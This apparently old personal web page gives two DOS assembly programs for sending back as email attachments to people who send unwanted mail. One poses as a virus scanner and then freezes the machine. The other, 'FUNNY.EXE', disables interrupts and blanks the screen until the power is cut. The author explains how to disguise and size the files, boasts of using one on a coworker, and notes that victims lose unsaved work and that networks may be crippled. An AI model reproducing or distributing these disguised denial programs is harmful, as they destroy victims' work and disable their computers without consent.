I used to have them. I got rid of these pests.

How I did it? I sent back some nice programs. And if they run Outlook Express, they can't resist to open the attachment.

What I do is NOT make a virus. It is at best a trojan horse, but in fact it doesn't even come close to a trojan. No harm is done (intentionaly) unless the victim is a real moron and starts an unknown executable.

Pestcontrol 1: the virus scanner

name scan

lf equ 10
cr equ 13

mov dx, offset text
mov ah, 9
int 021 ; show some message

back: cli ; disable keyboard etc
jmp back ; and do it again

mov ax, 04C00 ; by the time pigs can fly, ... int 021 ; ... the program is halted.

text db 'Scanning your system....', cr, lf db 'Please wait a minute. $'
db 1023 dup (073)

Yes, you are right, this COM file is something like 1 Kb in size. You can easily control the size by adjusting the value in the last line. Make sure to remain well under the 64K limit else the file cannot be a COM file anymore and there is a chance that a wraparound will occur in which you main routine will be overwritten.

I hesitate to explain the program. It's so damned simple. In part 1 the message is printed to the screen. In part 2 the computer is crippled and in part 3 the program returns to the command interpreter, only this point is never reached.... :o)

Believe me: people will wait HOURS before they get worried and try to Alt-Ctrl-Del themselves a way out of this problem. Only to find out that their efforts are in vain.
If this program is run from within a DOS box under WIndows, and the user had a lot of other tasks open, he will loose any unsaved work. And if he or she is on a network, it may be crippled as well.

So be a little bit careful who you treat to this attachment.....

Pestcontrol 2: something funny

name funny

cli ; disable keyboard and interrupts
cld ; make sure we move upwards
mov ax, 0A000 ; point to start of VGA pixel RAM mov es, ax
mov ds, ax
L1: cli ; INT's off again, just in case... mov cx, 08000
mov ax, 0
mov di, ax
mov si, ax
L0: cli ; did I turn of INT's?
lodsw ; fetch word from VGA screen
xor ax, ax ; clear it
stosw ; and store it
loop L0 ; loop back to CLI instruction
cli ; and turn off interrupts
jmp L1 ; before jumping back to the CLI.

db 22K dup ('Í ') ; add some more muscles.

This is a real nasty program. One of the guys at work (two windows away from my place; I could see the results...) had been sending me several 500 Kb funnies. I asked him to remove me from his mailing but he didn't listen. So I shot back (hey, it was self defence!).

The first part of the program kills the keyboard and other interrupts, whereas the second part plays a nasty trick on the user screen. I assume the user is running Windows on a VGA screen.... It keeps on pumping ZERO's into display memory in a loop that's almost impossible to stop. If the CPU would manage to enable interrupts again it will loose control after another few nanoseconds (on modern CPU's) or microseconds (on older ones).

The result is devastating: they run the FUNNY.EXE (if there is no MZ in the exe-header, the program is considered a COM file) and the screen turns black immediately and they loose all control of the machine. The three fingered salute will not help. The only option is to pull the plug.

This executable did the trick. Four requests to relieve me from his mail assaults did not work. One counterattack with my Funny Exe was effective immediately.

Afterthoughts

Reminder